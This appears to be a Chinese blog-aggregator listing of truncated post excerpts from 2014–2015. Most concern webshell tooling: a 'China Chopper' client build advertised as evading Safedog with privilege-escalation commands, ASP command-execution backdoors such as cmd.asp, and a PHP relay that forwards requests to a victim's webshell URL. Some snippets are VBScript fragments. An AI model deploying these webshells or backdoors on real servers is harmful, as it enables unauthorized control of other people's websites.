Setargs=WScript.Arguments
ifargs.count<>1thenmsgbox"db.mdb":wscript.quit
Setconn=CreateObject("ADODB.Connection")
pwd="密"&chr(13)&chr(9)&chr(10)&"码"&chr(2)
connStr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&args(0)&";..
分类:
其他好文 时间:
2015-06-10 15:51:11
阅读次数:
1056
最新专版过狗菜刀,过目前最新版V4.2安全狗!1.支持过服务器安全狗V4.1.088932.支持过网站安全狗V3.3.090603.增加提权特殊命令功能 百度网盘:http://pan.baidu.com/s/1gdtiTTh51CTO下载:http://down.51cto.com/data/20...
分类:
其他好文 时间:
2015-04-11 19:13:35
阅读次数:
228
scripthost = wscript.fullnamescripthost = right(scripthost, 11)if not (ucase(scripthost) = "CSCRIPT.EXE") thenset ws=Create("wscript.shell")ws.run "cs...
分类:
其他好文 时间:
2015-04-07 23:25:13
阅读次数:
194
用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用P...
分类:
其他好文 时间:
2015-02-11 12:36:18
阅读次数:
13093
工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<formmethod="post">
<inputtype=textname="cmd"size=60>..
分类:
Web程序 时间:
2014-12-15 06:37:08
阅读次数:
1439
通过本地中转可以很好地防止带后门的菜刀窃取webshell。PHP代码如下所示,原理自行思考,不懂的请留言
<?php
$webshell="http://www.victim.com/webshell.php";//把这里改成你的shell地址
$temp=$_POST;
$data = $temp;
$data = http_build_query($data);
$...
分类:
Web程序 时间:
2014-11-30 00:30:51
阅读次数:
659